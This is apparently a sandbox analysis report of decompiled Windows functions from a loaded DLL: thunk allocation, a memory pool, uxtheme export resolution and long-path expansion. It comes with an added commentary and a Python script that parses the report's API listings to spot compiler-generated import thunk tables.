                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: d01f9c4df4e897b44e15f78893118b8bd49ba451deabd4bbdab2a16f4fd6da6f
                          • Instruction ID: 4c52486357115ab605b7c2e849b2f69f0a60a76eb15dfe2f9792ade8c4948330
                          • Opcode Fuzzy Hash: d01f9c4df4e897b44e15f78893118b8bd49ba451deabd4bbdab2a16f4fd6da6f
                          • Instruction Fuzzy Hash: 8311A976A04701DFC3108F28CC80A2ABBE5EBC4760F86C63CF58887395E735AC408A81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 241 71dce8-71dcf6 242 71dd64-71dd7d 241->242 243 71dcf8-71dd21 VirtualAlloc call 7028c8 241->243 245 71dd26-71dd36 call 71dce0 243->245 248 71dd39-71dd5c call 71dce0 245->248 251 71dd5e 248->251 251->242
                          C-Code - Quality: 100%
                          			E0071DCE8(intOrPtr _a4, intOrPtr _a8) {
                          				void* _t14;
                          				void _t15;
                          				intOrPtr _t25;
                          				char* _t26;
                          				void* _t35;
                          
                          				if( *0x76f88c == 0) {
                          					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
                          					_t35 = _t14;
                          					_t15 =  *0x76f888; // 0x860000
                          					 *_t35 = _t15;
                          					_t1 = _t35 + 4; // 0x4
                          					E007028C8(0x76c408, 2, _t1);
                          					_t2 = _t35 + 5; // 0x5
                          					 *((intOrPtr*)(_t35 + 6)) = L0071DCE0(_t2, 0x71dcc0);
                          					_t4 = _t35 + 0xa; // 0xa
                          					_t26 = _t4;
                          					do {
                          						 *_t26 = 0xe8;
                          						_t5 = _t35 + 4; // 0x4
                          						 *((intOrPtr*)(_t26 + 1)) = L0071DCE0(_t26, _t5);
                          						 *((intOrPtr*)(_t26 + 5)) =  *0x76f88c;
                          						 *0x76f88c = _t26;
                          						_t26 = _t26 + 0xd;
                          					} while (_t26 - _t35 < 0xffc);
                          					 *0x76f888 = _t35;
                          				}
                          				_t25 =  *0x76f88c;
                          				 *0x76f88c =  *((intOrPtr*)(_t25 + 5));
                          				 *((intOrPtr*)(_t25 + 5)) = _a4;
                          				 *((intOrPtr*)(_t25 + 9)) = _a8;
                          				return  *0x76f88c;
                          			}

                          Instruction addresses for the listing above: 0x0071dcf6, 0x0071dd06, 0x0071dd0b, 0x0071dd0d, 0x0071dd12, 0x0071dd14, 0x0071dd21, 0x0071dd2b, 0x0071dd33, 0x0071dd36, 0x0071dd36, 0x0071dd39, 0x0071dd39, 0x0071dd3c, 0x0071dd46, 0x0071dd4b, 0x0071dd4e, 0x0071dd50, 0x0071dd57, 0x0071dd5e, 0x0071dd5e, 0x0071dd66, 0x0071dd6b, 0x0071dd70, 0x0071dd76, 0x0071dd7d

                          APIs
                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0071DD06
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: e1430b7fb496a6f9b5fc9f77f99d640977f17c88008f9d9aaa25fb7f10649e74
                          • Instruction ID: 76e92bcdffcf8cfd9070f408226ab6128baa1d2eb43a0d9ef4401212bdb64544
                          • Opcode Fuzzy Hash: e1430b7fb496a6f9b5fc9f77f99d640977f17c88008f9d9aaa25fb7f10649e74
                          • Instruction Fuzzy Hash: BE114874240316DFC720DF18D880B86BBE5EB49350B20C93AE9999B385D3B8E845CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 252 701380-70138a 253 7013c6-7013ce 252->253 254 70138c-70139c LocalAlloc 252->254 255 7013a3-7013b0 254->255 256 70139e-7013a2 254->256 257 7013b2-7013c4 255->257 257->253 257->257
                          C-Code - Quality: 100%
                          			E00701380() {
                          				intOrPtr* _t4;
                          				void* _t5;
                          				void _t6;
                          				intOrPtr* _t9;
                          				void* _t12;
                          				void* _t14;
                          
                          				if( *0x76f5e8 != 0) {
                          					L5:
                          					_t4 =  *0x76f5e8;
                          					 *0x76f5e8 =  *_t4;
                          					return _t4;
                          				} else {
                          					_t5 = LocalAlloc(0, 0x644); // executed
                          					_t12 = _t5;
                          					if(_t12 != 0) {
                          						_t6 =  *0x76f5e4; // 0xa73af0
                          						 *_t12 = _t6;
                          						 *0x76f5e4 = _t12;
                          						_t14 = 0;
                          						do {
                          							_t2 = (_t14 + _t14) * 8; // 0x4
                          							_t9 = _t12 + _t2 + 4;
                          							 *_t9 =  *0x76f5e8;
                          							 *0x76f5e8 = _t9;
                          							_t14 = _t14 + 1;
                          						} while (_t14 != 0x64);
                          						goto L5;
                          					} else {
                          						return 0;
                          					}
                          				}
                          			}

                          Instruction addresses for the listing above: 0x0070138a, 0x007013c6, 0x007013c6, 0x007013ca, 0x007013ce, 0x0070138c, 0x00701393, 0x00701398, 0x0070139c, 0x007013a3, 0x007013a8, 0x007013aa, 0x007013b0, 0x007013b2, 0x007013b6, 0x007013b6, 0x007013bc, 0x007013be, 0x007013c0, 0x007013c1, 0x00000000, 0x0070139e, 0x007013a2, 0x007013a2, 0x0070139c

                          APIs
                          • LocalAlloc.KERNEL32(00000000,00000644,?,0076F5FC,007013E3,?,?,00701482,?,?,?,00000000,00004003,007019C3), ref: 00701393
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: AllocLocal
                          • String ID:
                          • API String ID: 3494564517-0
                          • Opcode ID: c2719c175a0c9af433d1d3de227f5bfadc86fe7dbe88cd59617848a85a90fd8e
                          • Instruction ID: 5bb3d2ad4a385ddcf675a41726058c9bf0f40af86b33d10da509f6b3afee036a
                          • Opcode Fuzzy Hash: c2719c175a0c9af433d1d3de227f5bfadc86fe7dbe88cd59617848a85a90fd8e
                          • Instruction Fuzzy Hash: C0F058B5701201CFD724CF28E8807A5B3E1FB99356F60827AE286C7791E2799C518B80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 266 72921c-729247 call 729014 269 7295b0-7295ce call 72901c 266->269 270 72924d-72925c LoadLibraryA 266->270 270->269 271 729262-7295ab GetProcAddress * 47 270->271 271->269
                          C-Code - Quality: 90%
                          			E0072921C(void* __ebx, void* __ecx) {
                          				char _v5;
                          				intOrPtr _t2;
                          				intOrPtr _t6;
                          				intOrPtr _t108;
                          				intOrPtr _t111;
                          
                          				_t2 =  *0x76fa48; // 0x23f0dc8
                          				E00729014(_t2);
                          				_push(_t111);
                          				_push(0x7295cf);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t111;
                          				 *0x76fa44 =  *0x76fa44 + 1;
                          				if( *0x76fa40 == 0) {
                          					 *0x76fa40 = LoadLibraryA("uxtheme.dll");
                          					if( *0x76fa40 > 0) {
                          						 *0x76f980 = GetProcAddress( *0x76fa40, "OpenThemeData");
                          						 *0x76f984 = GetProcAddress( *0x76fa40, "CloseThemeData");
                          						 *0x76f988 = GetProcAddress( *0x76fa40, "DrawThemeBackground");
                          						 *0x76f98c = GetProcAddress( *0x76fa40, "DrawThemeText");
                          						 *0x76f990 = GetProcAddress( *0x76fa40, "GetThemeBackgroundContentRect");
                          						 *0x76f994 = GetProcAddress( *0x76fa40, "GetThemeBackgroundContentRect");
                          						 *0x76f998 = GetProcAddress( *0x76fa40, "GetThemePartSize");
                          						 *0x76f99c = GetProcAddress( *0x76fa40, "GetThemeTextExtent");
                          						 *0x76f9a0 = GetProcAddress( *0x76fa40, "GetThemeTextMetrics");
                          						 *0x76f9a4 = GetProcAddress( *0x76fa40, "GetThemeBackgroundRegion");
                          						 *0x76f9a8 = GetProcAddress( *0x76fa40, "HitTestThemeBackground");
                          						 *0x76f9ac = GetProcAddress( *0x76fa40, "DrawThemeEdge");
                          						 *0x76f9b0 = GetProcAddress( *0x76fa40, "DrawThemeIcon");
                          						 *0x76f9b4 = GetProcAddress( *0x76fa40, "IsThemePartDefined");
                          						 *0x76f9b8 = GetProcAddress( *0x76fa40, "IsThemeBackgroundPartiallyTransparent");
                          						 *0x76f9bc = GetProcAddress( *0x76fa40, "GetThemeColor");
                          						 *0x76f9c0 = GetProcAddress( *0x76fa40, "GetThemeMetric");
                          						 *0x76f9c4 = GetProcAddress( *0x76fa40, "GetThemeString");
                          						 *0x76f9c8 = GetProcAddress( *0x76fa40, "GetThemeBool");
                          						 *0x76f9cc = GetProcAddress( *0x76fa40, "GetThemeInt");
                          						 *0x76f9d0 = GetProcAddress( *0x76fa40, "GetThemeEnumValue");
                          						 *0x76f9d4 = GetProcAddress( *0x76fa40, "GetThemePosition");
                          						 *0x76f9d8 = GetProcAddress( *0x76fa40, "GetThemeFont");
                          						 *0x76f9dc = GetProcAddress( *0x76fa40, "GetThemeRect");
                          						 *0x76f9e0 = GetProcAddress( *0x76fa40, "GetThemeMargins");
                          						 *0x76f9e4 = GetProcAddress( *0x76fa40, "GetThemeIntList");
                          						 *0x76f9e8 = GetProcAddress( *0x76fa40, "GetThemePropertyOrigin");
                          						 *0x76f9ec = GetProcAddress( *0x76fa40, "SetWindowTheme");
                          						 *0x76f9f0 = GetProcAddress( *0x76fa40, "GetThemeFilename");
                          						 *0x76f9f4 = GetProcAddress( *0x76fa40, "GetThemeSysColor");
                          						 *0x76f9f8 = GetProcAddress( *0x76fa40, "GetThemeSysColorBrush");
                          						 *0x76f9fc = GetProcAddress( *0x76fa40, "GetThemeSysBool");
                          						 *0x76fa00 = GetProcAddress( *0x76fa40, "GetThemeSysSize");
                          						 *0x76fa04 = GetProcAddress( *0x76fa40, "GetThemeSysFont");
                          						 *0x76fa08 = GetProcAddress( *0x76fa40, "GetThemeSysString");
                          						 *0x76fa0c = GetProcAddress( *0x76fa40, "GetThemeSysInt");
                          						 *0x76fa10 = GetProcAddress( *0x76fa40, "IsThemeActive");
                          						 *0x76fa14 = GetProcAddress( *0x76fa40, "IsAppThemed");
                          						 *0x76fa18 = GetProcAddress( *0x76fa40, "GetWindowTheme");
                          						 *0x76fa1c = GetProcAddress( *0x76fa40, "EnableThemeDialogTexture");
                          						 *0x76fa20 = GetProcAddress( *0x76fa40, "IsThemeDialogTextureEnabled");
                          						 *0x76fa24 = GetProcAddress( *0x76fa40, "GetThemeAppProperties");
                          						 *0x76fa28 = GetProcAddress( *0x76fa40, "SetThemeAppProperties");
                          						 *0x76fa2c = GetProcAddress( *0x76fa40, "GetCurrentThemeName");
                          						 *0x76fa30 = GetProcAddress( *0x76fa40, "GetThemeDocumentationProperty");
                          						 *0x76fa34 = GetProcAddress( *0x76fa40, "DrawThemeParentBackground");
                          						 *0x76fa38 = GetProcAddress( *0x76fa40, "EnableTheming");
                          					}
                          				}
                          				_v5 =  *0x76fa40 > 0;
                          				_pop(_t108);
                          				 *[fs:eax] = _t108;
                          				_push(0x7295d6);
                          				_t6 =  *0x76fa48; // 0x23f0dc8
                          				return E0072901C(_t6);
                          			}

                          Instruction addresses for the listing above: 0x00729226, 0x0072922b, 0x00729232, 0x00729233, 0x00729238, 0x0072923b, 0x0072923e, 0x00729247, 0x00729257, 0x0072925c, 0x0072926f, 0x00729281, 0x00729293, 0x007292a5, 0x007292b7, 0x007292c9, 0x007292db, 0x007292ed, 0x007292ff, 0x00729311, 0x00729323, 0x00729335, 0x00729347, 0x00729359, 0x0072936b, 0x0072937d, 0x0072938f, 0x007293a1, 0x007293b3, 0x007293c5, 0x007293d7, 0x007293e9, 0x007293fb, 0x0072940d, 0x0072941f, 0x00729431, 0x00729443, 0x00729455, 0x00729467, 0x00729479, 0x0072948b, 0x0072949d, 0x007294af, 0x007294c1, 0x007294d3, 0x007294e5, 0x007294f7, 0x00729509, 0x0072951b, 0x0072952d, 0x0072953f, 0x00729551, 0x00729563, 0x00729575, 0x00729587, 0x00729599, 0x007295ab, 0x007295ab, 0x0072925c, 0x007295b3, 0x007295b9, 0x007295bc, 0x007295bf, 0x007295c4, 0x007295ce

                          APIs
                          • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,007295CF), ref: 00729252
                          • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0072926A
                          • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0072927C
                          • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0072928E
                          • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 007292A0
                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 007292B2
                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 007292C4
                          • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 007292D6
                          • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 007292E8
                          • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 007292FA
                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0072930C
                          • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0072931E
                          • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 00729330
                          • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 00729342
                          • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 00729354
                          • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 00729366
                          • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 00729378
                          • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0072938A
                          • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0072939C
                          • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 007293AE
                          • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 007293C0
                          • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 007293D2
                          • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 007293E4
                          • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 007293F6
                          • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 00729408
                          • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0072941A
                          • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0072942C
                          • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0072943E
                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00729450
                          • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 00729462
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 00729474
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 00729486
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 00729498
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 007294AA
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 007294BC
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 007294CE
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 007294E0
                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 007294F2
                          • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00729504
                          • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 00729516
                          • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 00729528
                          • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0072953A
                          • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0072954C
                          • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0072955E
                          • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 00729570
                          • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 00729582
                          • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 00729594
                          • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 007295A6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                          • API String ID: 2238633743-2910565190
                          • Opcode ID: bfad42bf86ccd24602374d229b6f896c81655ff772a28bc02625a9630c88dbfd
                          • Instruction ID: f2edb4e36c1fdfcf8d63e3858f35af5029bf9b1dbc2f21e03071756c38d571b4
                          • Opcode Fuzzy Hash: bfad42bf86ccd24602374d229b6f896c81655ff772a28bc02625a9630c88dbfd
                          • Instruction Fuzzy Hash: DAA1E9F0A11760EFEF00EFB4FD9AA293BE8EB067007444665F501DF295D6BC99118B25
                          Uniqueness

                          Uniqueness Score: -1.00%
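The 47 GetProcAddress calls listed above sit exactly 0x12 bytes apart (0072926A, 0072927C, ..., 007295A6), the regular footprint of a compiler-generated import thunk table, and every name is a documented uxtheme.dll export: this block is UI library code that links its theme API at run time, not a hand-written API resolver. Note that the report prints GetThemeBackgroundContentRect twice (refs 007292B2 and 007292C4) while its String ID line holds 46 distinct symbol names; the second entry is kept as printed rather than guessed. The Python below is an added example, not part of the Joe Sandbox report: it parses API bullets of this shape, flags constant-stride GetProcAddress runs, and harvests the textual arguments (the caller stack residue that makes strings such as Software\Borland\Locales appear on calls that never take them). The twelve embedded lines are copied from this page; the run threshold (min_run) is an assumption.

```python
import re

# One "APIs" bullet as Joe Sandbox prints it:
#   • Name.MODULE(arg1,arg2,...), ref: ADDRESS
API_LINE = re.compile(
    r"^\s*•\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_WORD = re.compile(r"^[0-9A-Fa-f]{8}$")

# Lines copied from the report (first eight from the uxtheme thunk table, the rest
# from the path-resolution function) so the script runs offline.
SAMPLE = r"""
• LoadLibraryA.KERNEL32(uxtheme.dll,00000000,007295CF), ref: 00729252
• GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0072926A
• GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0072927C
• GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0072928E
• GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 007292A0
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 007292B2
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 007292C4
• GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 007292D6
• GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,0076C0A4,?,00705624,00000000,00705681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 007053E1
• GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 007053F2
• lstrcpyn.KERNEL32(?,?,?,?,00705624,00000000,00705681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00705422
• FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,?,0076C0A4,?,00705624,00000000,00705681), ref: 007054CE
"""


def parse_api_lines(text):
    """Turn report bullets into dicts: name, module, argument list, and ref as an int."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            calls.append({
                "name": m["name"],
                "module": m["module"],
                "args": [a.strip() for a in m["args"].split(",")],
                "ref": int(m["ref"], 16),
            })
    return calls


def thunk_table_runs(calls, min_run=4):
    """Find runs of GetProcAddress calls whose ref addresses advance by a constant stride.

    A compiler-emitted import thunk table resolves every symbol with the same stub, so
    consecutive call sites sit a fixed number of bytes apart (0x12 for the uxtheme block).
    A hand-rolled resolver loop calls GetProcAddress from one site and leaves no such run."""
    gpa = sorted((c for c in calls if c["name"] == "GetProcAddress"), key=lambda c: c["ref"])
    runs, i = [], 0
    while i + 1 < len(gpa):
        stride = gpa[i + 1]["ref"] - gpa[i]["ref"]
        j = i + 1
        while j + 1 < len(gpa) and gpa[j + 1]["ref"] - gpa[j]["ref"] == stride:
            j += 1
        if j - i + 1 >= min_run:            # gpa[i..j] share one stride
            runs.append({
                "first": gpa[i]["ref"],
                "stride": stride,
                "symbols": [c["args"][1] for c in gpa[i:j + 1]],
            })
            i = j + 1
        else:
            i += 1
    return runs


def string_args(calls):
    """Collect the textual arguments in first-seen order (anything that is not '?' or a
    bare 8-digit hex word). Joe Sandbox prints leftover stack slots of the callers as
    extra arguments, which is why 'Software\\Borland\\Locales' shows up on lstrcpyn."""
    seen = []
    for c in calls:
        for a in c["args"]:
            if a and a != "?" and not HEX_WORD.match(a) and a not in seen:
                seen.append(a)
    return seen


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    for run in thunk_table_runs(calls):
        print(f"thunk table at {run['first']:08X}, stride 0x{run['stride']:X}: {run['symbols']}")
    print("strings:", string_args(calls))
```

Feed the whole "APIs" section of a report to parse_api_lines and a constant-stride run of dozens of GetProcAddress calls is a quick reason to deprioritise that function; the interesting resolvers are the ones that leave no run at all, or whose resolved names do not belong to the library the code claims to load.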

                          C-Code - Quality: 53%
                          			E007053C4(char* __eax, intOrPtr __edx) {
                          				char* _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				struct _WIN32_FIND_DATAA _v334;
                          				char _v595;
                          				void* _t45;
                          				char* _t54;
                          				char* _t64;
                          				void* _t83;
                          				intOrPtr* _t84;
                          				char* _t90;
                          				struct HINSTANCE__* _t91;
                          				char* _t93;
                          				void* _t94;
                          				char* _t95;
                          				void* _t96;
                          
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_v16 = _v8;
                          				_t91 = GetModuleHandleA("kernel32.dll"); // GetLongPathNameA is resolved at run time below; the component walk is the fallback for systems without it
                          				if(_t91 == 0) {
                          					L4:
                          					if( *_v8 != 0x5c) { // 0x5c is '\': a drive-letter path keeps its two-character "X:" prefix as-is
                          						_t93 = _v8 + 2;
                          						goto L10;
                          					} else {
                          						if( *((char*)(_v8 + 1)) == 0x5c) { // "\\server\share\...": the server and share components are skipped, not looked up
                          							_t95 = E007053B0(_v8 + 2);
                          							if( *_t95 != 0) {
                          								_t14 = _t95 + 1; // 0x1
                          								_t93 = E007053B0(_t14);
                          								if( *_t93 != 0) {
                          									L10:
                          									_t83 = _t93 - _v8;
                          									_push(_t83 + 1);
                          									_push(_v8);
                          									_push( &_v595);
                          									L007012A4();
                          									while( *_t93 != 0) {
                          										_t90 = E007053B0(_t93 + 1);
                          										_t45 = _t90 - _t93;
                          										if(_t45 + _t83 + 1 <= 0x105) { // 0x105 is MAX_PATH + 1, the size of the _v595 stack buffer; the function gives up rather than overrun it
                          											_push(_t45 + 1);
                          											_push(_t93);
                          											_push( &(( &_v595)[_t83]));
                          											L007012A4();
                          											_t94 = FindFirstFileA( &_v595,  &_v334); // directory lookup of the component; cFileName holds its long form
                          											if(_t94 != 0xffffffff) {
                          												FindClose(_t94);
                          												_t54 =  &(_v334.cFileName);
                          												_push(_t54);
                          												L007012AC();
                          												if(_t54 + _t83 + 1 + 1 <= 0x105) { // room for '\' + cFileName + NUL
                          													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
                          													_push(0x105 - _t83 - 1);
                          													_push( &(_v334.cFileName));
                          													_push( &(( &(( &_v595)[_t83]))[1]));
                          													L007012A4();
                          													_t64 =  &(_v334.cFileName);
                          													_push(_t64);
                          													L007012AC();
                          													_t83 = _t83 + _t64 + 1;
                          													_t93 = _t90;
                          													continue;
                          												}
                          											}
                          										}
                          										goto L17;
                          									}
                          									// every component resolved: copy the long form back into the caller's buffer (at most __edx characters)
                          									_push(_v12);
                          									_push( &_v595);
                          									_push(_v8);
                          									L007012A4();
                          								}
                          							}
                          						}
                          					}
                          				} else {
                          					_t84 = GetProcAddress(_t91, "GetLongPathNameA"); // preferred path: let kernel32 do the expansion
                          					if(_t84 == 0) {
                          						goto L4;
                          					} else {
                          						_push(0x105);
                          						_push( &_v595);
                          						_push(_v8);
                          						if( *_t84() == 0) {
                          							goto L4;
                          						} else {
                          							_push(_v12);
                          							_push( &_v595);
                          							_push(_v8);
                          							L007012A4();
                          						}
                          					}
                          				}
                          				L17:
                          				return _v16; // the caller's buffer; after any failure above it still holds the original path
                          			}

                          Instruction addresses for the C code above, in line order:
                          0x007053d0 0x007053d3 0x007053d9 0x007053e6 0x007053ea 0x0070542c 0x00705432 0x0070546f 0x00000000 0x00705434
                          0x0070543b 0x0070544c 0x00705451 0x00705457 0x0070545f 0x00705464 0x00705472 0x00705474 0x0070547a 0x0070547e
                          0x00705485 0x00705486 0x00705531 0x00705498 0x0070549c 0x007054a9 0x007054b0 0x007054b1 0x007054ba 0x007054bb
                          0x007054d3 0x007054d8 0x007054db 0x007054e0 0x007054e6 0x007054e7 0x007054f7 0x007054f9 0x00705509 0x00705510
                          0x0070551a 0x0070551b 0x00705520 0x00705526 0x00705527 0x0070552d 0x0070552f 0x00000000 0x0070552f 0x007054f7
                          0x007054d8 0x00000000 0x007054a9 0x0070553d 0x00705544 0x00705548 0x00705549 0x00705549 0x00705464 0x00705451
                          0x0070543b 0x007053ec 0x007053f7 0x007053fb 0x00000000 0x007053fd 0x007053fd 0x00705408 0x0070540c 0x00705411
                          0x00000000 0x00705413 0x00705416 0x0070541d 0x00705421 0x00705422 0x00705422 0x00705411 0x007053fb 0x0070554e
                          0x00705557

                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,0076C0A4,?,00705624,00000000,00705681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 007053E1
                          • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 007053F2
                          • lstrcpyn.KERNEL32(?,?,?,?,00705624,00000000,00705681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00705422
                          • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,00000000,?,0076C0A4,?,00705624,00000000,00705681,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00705486
                          • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,00000000,?,0076C0A4,?,00705624,00000000,00705681,?,80000001), ref: 007054BB
                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,?,0076C0A4,?,00705624,00000000,00705681), ref: 007054CE
                          • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,?,0076C0A4,?,00705624,00000000), ref: 007054DB
                          • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,?,0076C0A4,?,00705624), ref: 007054E7
                          • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,?), ref: 0070551B
